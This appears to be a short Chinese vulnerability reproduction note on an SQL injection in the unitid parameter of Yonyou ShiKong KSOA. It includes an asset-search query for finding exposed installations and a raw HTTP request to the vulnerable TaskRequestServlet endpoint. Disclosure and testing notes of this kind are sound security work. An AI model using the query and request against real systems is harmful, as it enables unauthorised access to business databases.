登录 白背景
源码

用友时空KSOA unitid参数存在SQL注入漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.9);">用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台unitid参数存在SQL注入漏洞。</font>

<font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>

  • 用友时空KSOA

三、资产测绘

  • hunterapp.name="用友时空 KSOA"

1692118414187-50a002bf-7b35-4a5e-9cca-410e053dfd86.png

  • 登录页面

1692118428299-ee3e89a1-d166-4649-b288-943ccd7d5fc7.png

四、漏洞复现

GET /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=42640D8FBEC9198A7FDF8F90DABCDBB4
Upgrade-Insecure-Requests: 1

1693569772934-f61bec51-53ed-4476-bc2c-af88a49408a9.png

1693569742064-41b037a5-3ad1-4c54-b08a-0dc04e53bf7a.png

原文: https://www.yuque.com/xiaokp7/ocvun2/kg4b4d6l8nuucpd4